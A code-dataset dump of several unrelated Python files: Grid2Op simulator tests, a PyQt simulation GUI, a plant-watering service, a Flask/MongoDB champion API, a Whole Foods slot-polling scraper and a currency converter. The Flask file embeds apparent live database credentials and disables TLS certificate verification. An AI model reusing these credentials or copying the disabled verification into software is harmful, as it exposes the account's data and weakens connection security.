Simulator(backend=None, env=self.env)\n assert simulator.backend is not self.env.backend\n\n with self.assertRaises(SimulatorError):\n # backend should be a backend\n simulator = Simulator(backend=self.env)\n with self.assertRaises(SimulatorError):\n # backend is not None\n simulator = Simulator(backend=self.env.backend, env=self.env)\n with self.assertRaises(SimulatorError):\n # env is not a BaseEnv\n simulator = Simulator(backend=self.env.backend, env=self.env.backend)\n\n def test_change_backend(self):\n simulator = Simulator(backend=self.env.backend)\n with self.assertRaises(SimulatorError):\n # not initialized\n simulator.change_backend(self.env.backend.copy())\n\n simulator.set_state(self.obs)\n simulator.change_backend(self.env.backend.copy())\n\n with self.assertRaises(SimulatorError):\n # env is not a BaseEnv\n simulator.change_backend(self.env)\n\n def test_change_backend_type(self):\n simulator = Simulator(backend=self.env.backend)\n with self.assertRaises(SimulatorError):\n # not initialized\n simulator.change_backend_type(\n self.env.backend.copy(), grid_path=self.env._init_grid_path\n )\n\n simulator.set_state(self.obs)\n simulator.change_backend_type(\n self.env._raw_backend_class, grid_path=self.env._init_grid_path\n )\n\n with self.assertRaises(SimulatorError):\n # self.env.backend is not a type\n simulator.change_backend_type(\n self.env.backend, grid_path=self.env._init_grid_path\n )\n\n with self.assertRaises(SimulatorError):\n # wrong type\n simulator.change_backend_type(\n type(self.env), grid_path=self.env._init_grid_path\n )\n\n def test_predict(self):\n env = self.env\n simulator = Simulator(backend=self.env.backend)\n\n act1 = env.action_space({\"set_line_status\": [(1, -1)]})\n act2 = env.action_space(\n {\"set_bus\": {\"substations_id\": [(5, (2, 1, 2, 1, 2, 1, 2))]}}\n )\n\n with self.assertRaises(SimulatorError):\n # not initialized\n sim1 = simulator.predict(act1)\n\n simulator.set_state(self.obs)\n\n sim1 = simulator.predict(act1)\n assert sim1 is not simulator\n assert sim1.current_obs.rho[1] == 0.0\n\n sim2 = simulator.predict(act2)\n assert sim2 is not simulator\n assert abs(sim2.current_obs.rho[1] - 0.35845447) <= 1e-6\n\n sim3 = simulator.predict(act1).predict(act2, do_copy=False)\n assert abs(sim3.current_obs.rho[1]) <= 1e-6\n assert np.any(sim3.current_obs.rho != sim1.current_obs.rho)\n assert np.any(sim3.current_obs.rho != sim2.current_obs.rho)\n assert np.any(sim3.current_obs.rho != simulator.current_obs.rho)\n\n sim4 = simulator.predict(\n act1,\n new_gen_p=env.chronics_handler.real_data.data.prod_p[1],\n new_gen_v=env.chronics_handler.real_data.data.prod_v[1],\n new_load_p=env.chronics_handler.real_data.data.load_p[1],\n new_load_q=env.chronics_handler.real_data.data.load_q[1],\n )\n assert sim4 is not simulator\n assert sim4.current_obs.rho[1] == 0.0\n assert np.any(sim4.current_obs.rho != sim1.current_obs.rho)\n\n sim5 = sim1.predict(act2)\n assert abs(sim5.current_obs.rho[1]) <= 1e-6\n assert np.max(np.abs(sim5.current_obs.rho - sim3.current_obs.rho)) <= 1e-6\n\n sim6 = simulator.predict(act1, do_copy=False)\n assert sim6 is simulator\n assert abs(sim6.current_obs.rho[1]) <= 1e-6\n assert np.max(np.abs(sim6.current_obs.rho - sim1.current_obs.rho)) <= 1e-6\n\n def test_copy(self):\n simulator = Simulator(backend=self.env.backend)\n with self.assertRaises(SimulatorError):\n # not initialized\n sim1 = simulator.copy()\n\n simulator.set_state(self.obs)\n sim1 = simulator.copy()\n assert sim1 is not simulator\n assert np.max(np.abs(sim1.current_obs.rho - simulator.current_obs.rho)) <= 1e-6\n\n def test_obs(self):\n simulator = self.obs.get_simulator()\n assert np.max(np.abs(simulator.current_obs.rho - self.obs.rho)) <= 1e-6\n\n with self.assertRaises(BaseObservationError):\n sim2 = simulator.current_obs.get_simulator()\n\n\nclass TestComplexActions(unittest.TestCase):\n def setUp(self) -> None:\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\")\n self.env = grid2op.make(\n \"educ_case14_storage\", test=True, action_class=PlayableAction,\n _add_to_name=type(self).__name__\n )\n self.env.seed(0)\n self.obs = self.env.reset()\n self.simulator = Simulator(backend=self.env.backend)\n self.simulator.set_state(self.obs)\n\n def tearDown(self) -> None:\n self.env.close()\n self.simulator.close()\n\n def test_redisp_action(self):\n act = self.env.action_space({\"redispatch\": [(0, 5.0)]})\n obs, *_ = self.env.step(act)\n res = self.simulator.predict(\n act,\n new_gen_p=obs.gen_p - obs.actual_dispatch,\n new_load_p=obs.load_p,\n new_load_q=obs.load_q,\n )\n assert (\n np.max(np.abs(res.current_obs.target_dispatch - obs.target_dispatch))\n <= 1e-5\n )\n assert (\n np.max(np.abs(res.current_obs.actual_dispatch - obs.actual_dispatch))\n <= 1e-2\n )\n assert np.max(np.abs(res.current_obs.gen_p - obs.gen_p)) <= 1e-2\n\n act2 = self.env.action_space({\"redispatch\": [(0, 5.0), (1, 4.0)]})\n obs2, *_ = self.env.step(act2)\n res2 = res.predict(\n act2,\n new_gen_p=obs2.gen_p - obs.actual_dispatch,\n new_load_p=obs2.load_p,\n new_load_q=obs2.load_q,\n )\n assert (\n np.max(np.abs(res2.current_obs.target_dispatch - obs2.target_dispatch))\n <= 1e-2\n )\n # ultimately the redispatch should match (but not necessarily at this step)\n for _ in range(2):\n obsn, *_ = self.env.step(self.env.action_space())\n assert (\n np.max(np.abs(res2.current_obs.actual_dispatch - obsn.actual_dispatch))\n <= 2e-1\n )\n\n act3 = self.env.action_space({\"redispatch\": [(5, 3.0)]})\n obs3, *_ = self.env.step(act3)\n res3 = res2.predict(\n act3,\n new_gen_p=obs3.gen_p - obs3.actual_dispatch,\n new_load_p=obs3.load_p,\n new_load_q=obs3.load_q,\n )\n\n assert (\n np.max(np.abs(res3.current_obs.target_dispatch - obs3.target_dispatch))\n <= 2e-1\n )\n assert (\n np.max(np.abs(res3.current_obs.actual_dispatch - obs3.actual_dispatch))\n <= 4e-1\n )\n assert np.max(np.abs(res3.current_obs.gen_p - obs3.gen_p)) <= 4e-1\n\n def test_storage(self):\n act = self.env.action_space({\"set_storage\": [(0, -5.0)]})\n obs, *_ = self.env.step(act)\n res = self.simulator.predict(\n act,\n new_gen_p=obs.gen_p - obs.actual_dispatch,\n new_load_p=obs.load_p,\n new_load_q=obs.load_q,\n )\n assert (\n np.max(np.abs(res.current_obs.actual_dispatch - obs.actual_dispatch)) <= 0.1\n )\n assert np.max(np.abs(res.current_obs.gen_p - obs.gen_p)) <= 0.1\n assert np.max(np.abs(res.current_obs.storage_power - obs.storage_power)) <= 0.1\n assert (\n np.max(np.abs(res.current_obs.storage_charge - obs.storage_charge)) <= 0.1\n )\n\n # check Emin / Emax are met\n for it_num in range(16):\n res.predict(act, do_copy=False)\n assert res.converged, f\"error at iteration {it_num}\"\n assert np.all(res.current_obs.storage_power == [-5.0, 0.0])\n res.predict(act, do_copy=False)\n assert res.converged\n assert np.all(res.current_obs.storage_charge == [0.0, 3.5])\n assert np.all(np.abs(res.current_obs.storage_power - [-0.499, 0.0]) <= 0.01)\n res.predict(act, do_copy=False)\n assert res.converged\n assert np.all(res.current_obs.storage_charge == [0.0, 3.5])\n assert np.all(np.abs(res.current_obs.storage_power) <= 0.01)\n\n act2 = self.env.action_space({\"set_storage\": [(0, 5.0), (1, -10.0)]})\n res.predict(act2, do_copy=False)\n assert res.converged\n assert np.all(np.abs(res.current_obs.storage_charge - [0.417, 2.667]) <= 0.01)\n assert np.all(np.abs(res.current_obs.storage_power - [5.0, -10.0]) <= 0.01)\n\n def test_curtailment(self):\n gen_id = 2\n # should curtail 3.4 MW\n act = self.env.action_space()\n act.curtail_mw = [(gen_id, 5.0)]\n obs, *_ = self.env.step(act)\n new_gen_p = obs.gen_p - obs.actual_dispatch\n new_gen_p[gen_id] = obs.gen_p_before_curtail[gen_id]\n res = self.simulator.predict(\n act, new_gen_p=new_gen_p, new_load_p=obs.load_p, new_load_q=obs.load_q\n )\n assert (\n np.max(np.abs(res.current_obs.target_dispatch - obs.target_dispatch))\n <= 1e-5\n )\n assert (\n np.max(np.abs(res.current_obs.actual_dispatch - obs.actual_dispatch)) <= 0.1\n )\n assert np.max(np.abs(res.current_obs.gen_p - obs.gen_p)) <= 0.1\n\n # should curtail another 3 MW\n act2 = self.env.action_space()\n act2.curtail_mw = [(gen_id, 2.0)]\n obs1, *_ = self.env.step(act2)\n new_gen_p2 = obs1.gen_p - obs1.actual_dispatch\n new_gen_p2[gen_id] = obs1.gen_p_before_curtail[gen_id]\n res2 = self.simulator.predict(\n act2, new_gen_p=new_gen_p2, new_load_p=obs1.load_p, new_load_q=obs1.load_q\n )\n assert (\n np.max(np.abs(res2.current_obs.target_dispatch - obs1.target_dispatch))\n <= 1e-5\n )\n assert (\n np.max(np.abs(res2.current_obs.actual_dispatch - obs1.actual_dispatch))\n <= 0.01\n )\n assert np.max(np.abs(res2.current_obs.gen_p - obs1.gen_p)) <= 0.01\n\n # should curtail less (-4 MW)\n act3 = self.env.action_space()\n act3.curtail_mw = [(gen_id, 6.0)]\n obs2, *_ = self.env.step(act3)\n new_gen_p3 = obs2.gen_p - obs2.actual_dispatch\n new_gen_p3[gen_id] = obs2.gen_p_before_curtail[gen_id]\n res3 = self.simulator.predict(\n act3, new_gen_p=new_gen_p3, new_load_p=obs2.load_p, new_load_q=obs2.load_q\n )\n assert (\n np.max(np.abs(res3.current_obs.target_dispatch - obs2.target_dispatch))\n <= 1e-5\n )\n assert (\n np.max(np.abs(res3.current_obs.actual_dispatch - obs2.actual_dispatch))\n <= 0.2\n )\n assert np.max(np.abs(res3.current_obs.gen_p - obs2.gen_p)) <= 0.2\n\n # remove all curtailment\n act4 = self.env.action_space()\n act4.curtail_mw = [(gen_id, 9.0)]\n obs3, *_ = self.env.step(act4)\n new_gen_p4 = obs3.gen_p - obs3.actual_dispatch\n new_gen_p4[gen_id] = obs3.gen_p_before_curtail[gen_id]\n res4 = self.simulator.predict(\n act4, new_gen_p=new_gen_p4, new_load_p=obs3.load_p, new_load_q=obs3.load_q\n )\n assert np.max(np.abs(res4.current_obs.actual_dispatch)) <= 1e-5\n assert (\n np.max(np.abs(res4.current_obs.target_dispatch - obs3.target_dispatch))\n <= 1e-5\n )\n assert (\n np.max(np.abs(res4.current_obs.actual_dispatch - obs3.actual_dispatch))\n <= 0.2\n )\n assert np.max(np.abs(res4.current_obs.gen_p - obs3.gen_p)) <= 0.2\n\n # now test when I start from a previous step with curtailment already\n res5 = res3.predict(\n act4, new_gen_p=new_gen_p4, new_load_p=obs3.load_p, new_load_q=obs3.load_q\n )\n assert np.max(np.abs(res5.current_obs.actual_dispatch)) <= 1e-5\n assert (\n np.max(\n np.abs(\n res5.current_obs.target_dispatch - res4.current_obs.target_dispatch\n )\n )\n <= 0.01\n )\n assert (\n np.max(\n np.abs(\n res5.current_obs.actual_dispatch - res4.current_obs.actual_dispatch\n )\n )\n <= 0.01\n )\n assert np.max(np.abs(res5.current_obs.gen_p - res4.current_obs.gen_p)) <= 0.01\n\n # now another test where i still apply some curtailment\n res6 = res2.predict(\n act3, new_gen_p=new_gen_p3, new_load_p=obs2.load_p, new_load_q=obs2.load_q\n )\n assert (\n np.max(\n np.abs(\n res6.current_obs.target_dispatch - res3.current_obs.target_dispatch\n )\n )\n <= 0.01\n )\n assert (\n np.max(\n np.abs(\n res6.current_obs.actual_dispatch - res3.current_obs.actual_dispatch\n )\n )\n <= 0.01\n )\n assert np.max(np.abs(res6.current_obs.gen_p - res3.current_obs.gen_p)) <= 0.01\n\n # TODO test observation attributes:\n # res.current_obs.curtailment[:] = (new_gen_p - new_gen_p_modif) / act.gen_pmax\n # res.current_obs.curtailment_limit[:] = act.curtail\n # res.current_obs.curtailment_limit_effective[:] = act.curtail\n # res.current_obs.gen_p_before_curtail[:] = new_gen_p\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"rte-france/Grid2Op","sub_path":"grid2op/tests/test_simulator.py","file_name":"test_simulator.py","file_ext":"py","file_size_in_byte":14645,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"16"} +{"seq_id":"33771346859","text":"import sys\nimport seaborn as sb\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QPushButton, QWidget, QAction, QTabWidget, QVBoxLayout, QLabel\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import pyqtSlot\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport matplotlib.pyplot as plt\nfrom Model.GraficaComparasion import DiffusionTrendComparison\nfrom ProfileTreshold import *\nfrom Profile import *\nfrom Threshold import *\nfrom MakeGrap import *\n\n\nclass App(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.title = 'SIMULACIÓN'\n self.left = 0\n self.top = 0\n self.width = 1300\n self.height = 1200\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n self.table_widget = MyTableWidget(self)\n self.setCentralWidget(self.table_widget)\n self.setStyleSheet(\"color: blue;\"\n \"background-color: gray;\"\n \"selection-color: yellow;\"\n \"selection-background-color: blue;\")\n self.show()\n\n\nclass MyTableWidget(QWidget):\n\n def loadTabs(self):\n self.tabs = QTabWidget()\n self.tab1 = QWidget()\n self.tab2 = QWidget()\n self.tab3 = QWidget()\n self.tab4 = QWidget()\n self.tab5 = QWidget()\n # self.tab6 = QWidget()\n self.tabs.resize(300, 200)\n\n # self.tabs.addTab(self.tabG1,\"Grafo Barabaási-Albert\")\n # self.tabs.addTab(self.tabG2, \"Grafo Erdos-Rényi\")\n # self.tabs.addTab(self.tabG3,\"Grafo Watts y Strogatz\")\n # self.tabs.addTab(self.tabG4,\"Grafo Facebook\")\n\n self.tabs.addTab(self.tab1, \"Simulacion\")\n self.tabs.addTab(self.tab2, \"Barabási–Albert\")\n self.tabs.addTab(self.tab3, \"Erdös–Rényi\")\n self.tabs.addTab(self.tab4, \"Watts y Strogatz\")\n self.tabs.addTab(self.tab5, \"Facebook\")\n # self.tabs.addTab(self.tab6,\"Mapa de calor\")\n\n self.tab1.layout = QVBoxLayout(self)\n self.pushButton1 = QPushButton(\"INICIAR SIMULACIÓN\")\n self.tab1.layout.addWidget(self.pushButton1)\n self.tab1.setLayout(self.tab1.layout)\n\n # Graficsa para Fig 1\n self.figure = plt.figure()\n self.canvas = FigureCanvas(self.figure)\n self.toolbar = NavigationToolbar(self.canvas, self)\n self.pushButton1.clicked.connect(self.graficas)\n self.tab2.layout = QVBoxLayout(self)\n self.tab2.layout.addWidget(self.toolbar)\n self.tab2.layout.addWidget(self.canvas)\n self.tab2.setLayout(self.tab2.layout)\n\n # Graficsa para Fig 2\n self.figure2 = plt.figure()\n self.canvas2 = FigureCanvas(self.figure2)\n self.toolbar2 = NavigationToolbar(self.canvas2, self)\n self.tab3.layout = QVBoxLayout(self)\n self.tab3.layout.addWidget(self.toolbar2)\n self.tab3.layout.addWidget(self.canvas2)\n self.tab3.setLayout(self.tab3.layout)\n\n # # Graficsa para Fig 3\n self.figure3 = plt.figure()\n self.canvas3 = FigureCanvas(self.figure3)\n self.toolbar3 = NavigationToolbar(self.canvas3, self)\n self.tab4.layout = QVBoxLayout(self)\n self.tab4.layout.addWidget(self.toolbar3)\n self.tab4.layout.addWidget(self.canvas3)\n self.tab4.setLayout(self.tab4.layout)\n\n # # Graficsa para Facebook\n self.figure4 = plt.figure()\n self.canvas4 = FigureCanvas(self.figure4)\n self.toolbar4 = NavigationToolbar(self.canvas4, self)\n self.tab5.layout = QVBoxLayout(self)\n self.tab5.layout.addWidget(self.toolbar4)\n self.tab5.layout.addWidget(self.canvas4)\n self.tab5.setLayout(self.tab5.layout)\n\n self.AddGraphs()\n self.layout.addWidget(self.tabs)\n self.setLayout(self.layout)\n\n def __init__(self, parent):\n super(QWidget, self).__init__(parent)\n self.layout = QVBoxLayout(self)\n self.loadTabs()\n\n @pyqtSlot()\n def on_click(self):\n print(\"\\n\")\n for currentQTableWidgetItem in self.tableWidget.selectedItems():\n print(currentQTableWidgetItem.row(),\n currentQTableWidgetItem.column(), currentQTableWidgetItem.text())\n\n # def plotGraphs(self):\n\n def AddGraphs(self):\n\n self.ax1 = self.figure.add_subplot(221)\n self.ax2 = self.figure.add_subplot(222)\n self.ax3 = self.figure.add_subplot(223)\n self.ax4 = self.figure.add_subplot(224)\n\n self.ax11 = self.figure2.add_subplot(221)\n self.ax12 = self.figure2.add_subplot(222)\n self.ax13 = self.figure2.add_subplot(223)\n self.ax14 = self.figure2.add_subplot(224)\n\n self.ax21 = self.figure3.add_subplot(321)\n self.ax22 = self.figure3.add_subplot(322)\n self.ax23 = self.figure3.add_subplot(323)\n self.ax24 = self.figure3.add_subplot(324)\n self.ax25 = self.figure3.add_subplot(325)\n self.ax26 = self.figure3.add_subplot(326)\n\n self.ax31 = self.figure4.add_subplot(321)\n self.ax32 = self.figure4.add_subplot(322)\n self.ax33 = self.figure4.add_subplot(323)\n self.ax34 = self.figure4.add_subplot(324)\n self.ax35 = self.figure4.add_subplot(325)\n self.ax36 = self.figure4.add_subplot(326)\n\n def graficas(self):\n print('Inicio de Simulación')\n\n g = make_graph(1)\n self.graficar(0.05, 0.1, 0.1, 0, 0, g, \"Fig 1 a).png\", self.ax1)\n self.graficar(0.05, 0.4, 0.1, 0, 0, g, \"Fig 1 b).png\", self.ax2)\n self.graficar(0.05, 0.8, 0.1, 0, 0, g, \"Fig 1 c).png\", self.ax3)\n self.graficar(0.05, 0.4, 0.2, 0, 0, g, \"Fig 1 d).png\", self.ax4)\n print('Graficas de Barabasi Alberth')\n\n g2 = make_graph(2)\n self.graficar(0.05, 0.1, 0.1, 0, 0, g2, \"Fig 2 a).png\", self.ax11)\n self.graficar(0.05, 0.4, 0.1, 0, 0, g2, \"Fig 2 b).png\", self.ax12)\n self.graficar(0.05, 0.8, 0.1, 0, 0, g2, \"Fig 2 c).png\", self.ax13)\n self.graficar(0.05, 0.4, 0.2, 0, 0, g2, \"Fig 2 d).png\", self.ax14)\n print('Graficas de Erdós-Renyi')\n\n g3 = make_graph(3)\n self.graficar(0.05, 0.1, 0.1, 0, 0, g3, \"Fig 3 a).png\", self.ax21)\n self.graficar(0.05, 0.4, 0.1, 0, 0, g3, \"Fig 3 b).png\", self.ax22)\n self.graficar(0.05, 0.8, 0.1, 0, 0, g3, \"Fig 3 c).png\", self.ax23)\n self.graficar(0.05, 0.4, 0.2, 0, 0, g3, \"Fig 3 d).png\", self.ax24)\n self.graficar(0.05, 0.4, 0.3, 0, 0, g3, \"Fig 3 e).png\", self.ax25)\n self.graficar(0.05, 0.4, 0.4, 0, 0, g3, \"Fig 3 f).png\", self.ax26)\n print('Graficas de Wats-Strogatz')\n\n g4 = make_graph_db('facebook.txt', 'Facebook')\n self.graficar(0.05, 0.1, 0.1, 0, 0, g4, \"Fig 4 a).png\", self.ax31)\n self.graficar(0.05, 0.4, 0.1, 0, 0, g4, \"Fig 4 b).png\", self.ax32)\n self.graficar(0.05, 0.8, 0.1, 0, 0, g4, \"Fig 4 c).png\", self.ax33)\n self.graficar(0.05, 0.4, 0.2, 0, 0, g4, \"Fig 4 d).png\", self.ax34)\n self.graficar(0.05, 0.4, 0.3, 0, 0, g4, \"Fig 4 e).png\", self.ax35)\n self.graficar(0.05, 0.8, 0.2, 0, 0, g4, \"Fig 4 f).png\", self.ax36)\n print('Graficas de Facebook')\n\n self.canvas.draw()\n\n def graficar(self, if_seed, profile, threshold, p, a, g, name, pl):\n m1, t1, it1 = make_pt_graph_simulation(\n if_seed, profile, threshold, p, a, g)\n m2, t2 = make_p_graph_simulation(if_seed, profile, p, a, g)\n m3, t3 = make_t_graph_simulation(if_seed, threshold, p, a, g)\n viz = DiffusionTrendComparison([m1, m2, m3], [t1, t2, t3], plt=pl)\n lol = viz.plot(filename=name)\n return lol\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = App()\n sys.exit(app.exec_())","repo_name":"ChepeAicrag/Simulacion","sub_path":"App_Gui.py","file_name":"App_Gui.py","file_ext":"py","file_size_in_byte":7841,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9550086519","text":"class PlantFileService:\n '''Class is repsonsible for creating and reading data from a file'''\n\n def __init__(self, fileService, dateTime):\n try:\n self._fileService = fileService\n self._dateTime = dateTime\n except Exception as e:\n raise e\n \n def getLastWatered(self, plantName):\n '''gets the last watered response based on the plant name'''\n try:\n result = self._fileService.read(plantName + \"_last_watered.txt\")\n if result == \"\":\n return \"NEVER!\"\n \n return result\n except:\n return \"NEVER!\"\n\n def writePlantWatered(self, plantName):\n '''writes that the plant was watered to the output location'''\n self._fileService.write(plantName + \"_last_watered.txt\", \"Last watered {}\".format(self._dateTime.datetime.now()))\n ","repo_name":"swcarter007/AutoWater","sub_path":"Services/PlantFileService.py","file_name":"PlantFileService.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"3974200625","text":"\"\"\"\n2) Create the following Routes in your Flask Application (Use the data you persisted in Module 9)\n\nDefault Route (\"/\") - Go to a simple html template page that tells about your data.\nGET (\"/item\") - Will return UP TO 1000 items from your data.\nGET (\"/item/\") - Will return a single item from your data, by ID. If you data does not have a unique identifier then please let me know and I will help you get one added.\nDELETE(\"/item/\") - Will delete a single item (again, you will need a unique column name)\nPOST (\"/item\") - As opposed to GET, POST will create a new item in your database. The body of the request will contain the item to be added.\n\nI am having hard time with the CSS\n\nQuestions for Mckelly:\n1)Css not working\n2)Interactive HTML\n3)\n\n\"\"\"\n\nfrom pymongo import MongoClient\nfrom flask import Flask, g, render_template, abort, request\nfrom bson.json_util import dumps\nfrom bson.objectid import ObjectId\nimport ssl\nimport json\nimport dns\nimport os\nimport pprint\n\n# Configure the connection\nclient = MongoClient(\"mongodb+srv://jaceiverson:vufspUcCvsFX2yCT@test-ol2kq.mongodb.net/test?retryWrites=true\",ssl=True, ssl_cert_reqs=ssl.CERT_NONE)\ndb=client['Test']\nchamp=db['League Champions']\nchampionFile={}\n\n#puts all the champions into a dictionary locally\nfor x in champ.find():\n championFile[str([x['id']][0])]=x\n\n# Setup Flask\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n\n\n\n@app.route('/', methods=['GET'])\ndef hello():\n return render_template('landing.html')\n\n@app.route('/item', methods=['GET'])\ndef allItems():\n allChamps=champ.find()\n return dumps(allChamps), 200\n\n\n@app.route('/item/', methods=['GET'])\ndef oneItem(id):\n\n book = champ.find_one({\"id\": str(id)})\n\n return dumps(book), 200\n\n@app.route('/item//stats', methods=['GET'])\ndef oneChampStats(id):\n\n book = champ.find_one({\"id\": str(id)})\n stats=book['stats']\n return dumps(stats), 200\n\n\n@app.route('/item/', methods=['DELETE'])\ndef removeOneItem():\n pass\n\n@app.route('/item', methods=['POST'])\ndef postOneItem():\n pass\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"jaceiverson/Final-Riot","sub_path":"jaceAPIforMOD10.py","file_name":"jaceAPIforMOD10.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24248394564","text":"import bs4\n\nfrom selenium import webdriver\n\nimport sys\nimport time\n\nimport subprocess\n\n\ndef getWFSlot(productUrl):\n driver = webdriver.Chrome(\"D:\\Program Files (x86)\\Python\\Lib\\site-packages\\chromedriver_binary\\chromedriver.exe\")\n driver.get(productUrl) \n html = driver.page_source\n soup = bs4.BeautifulSoup(html)\n time.sleep(60)\n no_open_slots = True\n\n duration = 5000\n #milliseconds\n freq = 440\n\n\n while no_open_slots:\n driver.refresh()\n print(\"refreshed\")\n html = driver.page_source\n soup = bs4.BeautifulSoup(html)\n time.sleep(4)\n\n slot_pattern = 'Next available'\n try:\n next_slot_text = soup.find('h4', class_ ='ufss-slotgroup-heading-text a-text-normal').text\n print(\"text: %s\"%next_slot_text)\n if slot_pattern in next_slot_text:\n print('SLOTS OPEN!')\n subprocess.call([\"afplay\", \"music.wav\"])\n time.sleep(60000)\n except AttributeError:\n i = 0\n\n try:\n no_slot_pattern = 'No delivery windows available. New windows are released throughout the day.'\n no_slot_text = soup.find('h4', class_ ='a-alert-heading').text\n print(\"No slot: %s\"%no_slot_text)\n if no_slot_pattern == no_slot_text:\n print(\"NO SLOTS!\")\n else:\n subprocess.call([\"afplay\", \"music.wav\"])\n except AttributeError: \n print('SLOTS OPEN!')\n subprocess.call([\"afplay\", \"music.wav\"])\n time.sleep(60000)\n\n\ngetWFSlot('https://www.amazon.com/gp/buy/shipoptionselect/handlers/display.html?hasWorkingJavascript=1')\n\n\n","repo_name":"haodehen2020/WholeFoodDelivery","sub_path":"whole_foods_delivery_ios.py","file_name":"whole_foods_delivery_ios.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16419055412","text":"#Developer: Tyler Smith\r\n#Date: 11.06.16\r\n#Purpose: Gui interface for currency object\r\n# that converts American currency\r\n# to other foreign currencys.\r\n\r\nfrom tkinter import * # Import tkinter library \r\n\r\nfrom currencyObject import * # Import unitObject library\r\n\r\nclass currCalc(currencyCalc): # Clone currencyCalc class \r\n pass\r\n\r\nclass currencyApp(Tk): \r\n def __init__(self): # Constructor for GUI class\r\n Tk.__init__(self) # \r\n self.addTitle() # Display title on GUI\r\n self.addAllLabels() # Display text output on GUI\r\n self.addAllInputs() # Display text fields where data is in on GUI\r\n self.addButton() # Put button on GUI\r\n\r\n # Put title on GUI \r\n def addTitle(self):\r\n Label(self, text = \"Currency Calculator\", font =\r\n (\"Helvetica\", \"16\", \"bold italic\")).grid(columnspan = 2)\r\n Label(self, text = \"\", font =\r\n (\"Helvetica\", \"16\", \"bold italic\")).grid(columnspan = 2)\r\n\r\n # Put text output on GUI where data will be displayed next to\r\n def addAllLabels(self):\r\n Label(self, text = \" American Dollar(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 4, column = 0)\r\n Label(self, text = \" \", font =\r\n (\"Helvetica\", \"16\")).grid(row = 7, column = 0)\r\n Label(self, text = \" Canadian Dollar(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 8, column = 0)\r\n Label(self, text = \" British Pound(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 9, column = 0)\r\n Label(self, text = \" Euro(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 10, column = 0) \r\n Label(self, text = \" Chinese Yuan(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 11, column = 0)\r\n Label(self, text = \" Mexican Peso(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 12, column = 0)\r\n Label(self, text = \" Bitcoin(s) :\", font =\r\n (\"Helvetica\", \"14\")).grid(row = 13, column = 0)\r\n Label(self, text = \" \", font =\r\n (\"Helvetica\", \"16\")).grid(row = 14, column = 0)\r\n \r\n # Labels where data can change, but can't be entered in by user\r\n self.lblCanDollar = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblCanDollar.grid(row = 8, column = 1, sticky = \"we\")\r\n\r\n self.lblBritPound = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblBritPound.grid(row = 9, column = 1, sticky = \"we\")\r\n\r\n self.lblEuro = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblEuro.grid(row = 10, column = 1, sticky = \"we\")\r\n\r\n self.lblChinYuan = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblChinYuan.grid(row = 11, column = 1, sticky = \"we\")\r\n \r\n self.lblMexPeso = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblMexPeso.grid(row = 12, column = 1, sticky = \"we\")\r\n\r\n self.lblBitcoin = Label(self, bg = \"#fff\", anchor = \"w\", relief = \"groove\")\r\n self.lblBitcoin.grid(row = 13, column = 1, sticky = \"we\") \r\n \r\n # Put text inputs on screen for user to enter data in\r\n def addAllInputs(self):\r\n self.txtUSDollar = Entry(self) \r\n self.txtUSDollar.grid(row = 4, column = 1)\r\n\r\n # Put calculate button on GUI\r\n def addButton(self):\r\n self.btnCalc = Button(self, text = 'Currency Calculate', font =\r\n (\"Helvetica\", \"14\"))\r\n self.btnCalc.grid(row = 15, columnspan = 2)\r\n self.btnCalc[\"command\"] = self.calculate\r\n\r\n # Event that is triggered when calculate button is pushed\r\n def calculate(self):\r\n currObject = currCalc(float(self.txtUSDollar.get()))\r\n\r\n # Fill data fields according to what the user entered\r\n self.lblCanDollar[\"text\"] = (\"%.2f\" %currObject.getCanDollar())\r\n self.lblBritPound[\"text\"] = (\"%.2f\" %currObject.getBritPound())\r\n self.lblEuro[\"text\"] = (\"%.2f\" %currObject.getEuro())\r\n \r\n self.lblChinYuan[\"text\"] = (\"%.2f\" %currObject.getChinYuan())\r\n self.lblMexPeso[\"text\"] = (\"%.2f\" %currObject.getMexPeso())\r\n self.lblBitcoin[\"text\"] = (\"%.4f\" %currObject.getBitcoin()) \r\n\r\ndef main():\r\n myGui = currencyApp() # Instantiate myGUI object to begin building GUI \r\n myGui.mainloop()\r\n\r\n#Run main function\r\nif(__name__ == \"__main__\"):\r\n main() \r\n\r\n","repo_name":"tylersmithSD/Multipurpose_Calculator-Python","sub_path":"currencyApplication.py","file_name":"currencyApplication.py","file_ext":"py","file_size_in_byte":4251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"28275571950","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport configparser\nimport sys\nfrom pathlib import Path # nueva forma de 